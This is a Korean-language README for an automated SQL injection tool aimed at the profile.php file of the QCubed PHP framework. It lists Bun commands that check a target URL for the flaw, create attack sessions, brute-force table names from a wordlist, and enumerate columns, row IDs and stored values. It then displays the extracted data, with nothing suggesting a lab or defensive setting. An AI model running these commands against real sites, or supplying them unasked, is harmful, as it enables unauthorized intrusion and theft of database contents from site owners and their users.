
QCubed profile.php 파일에 대한 자동화된 SQL 인젝션
Bun이 설치되어 있어야 합니다: https://bun.sh
의존성을 설치하려면:
bun install
실행하려면:
# 도움말 표시
bun run exploit -h
# 취약점 테스트
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php
# 새 대상에 대한 세션 생성
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php
# 테이블 브루트포스
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt
# 발견된 테이블 또는 테이블의 컬럼 표시
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name
# id 브루트포스
bun run exploit brute-id -n your_session_name -t table_name -i 1
# row 값 브루트포스
# 선택적으로 -r을 추가하면 중단된 지점부터 브루트포스를 재개합니다
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1
# 테이블의 발견된 key-value 쌍 표시
# 선택적으로 특정 id만 표시하려면 `-i id_value`를 추가하세요
bun run exploit show-rows -n your_session_name -t table_name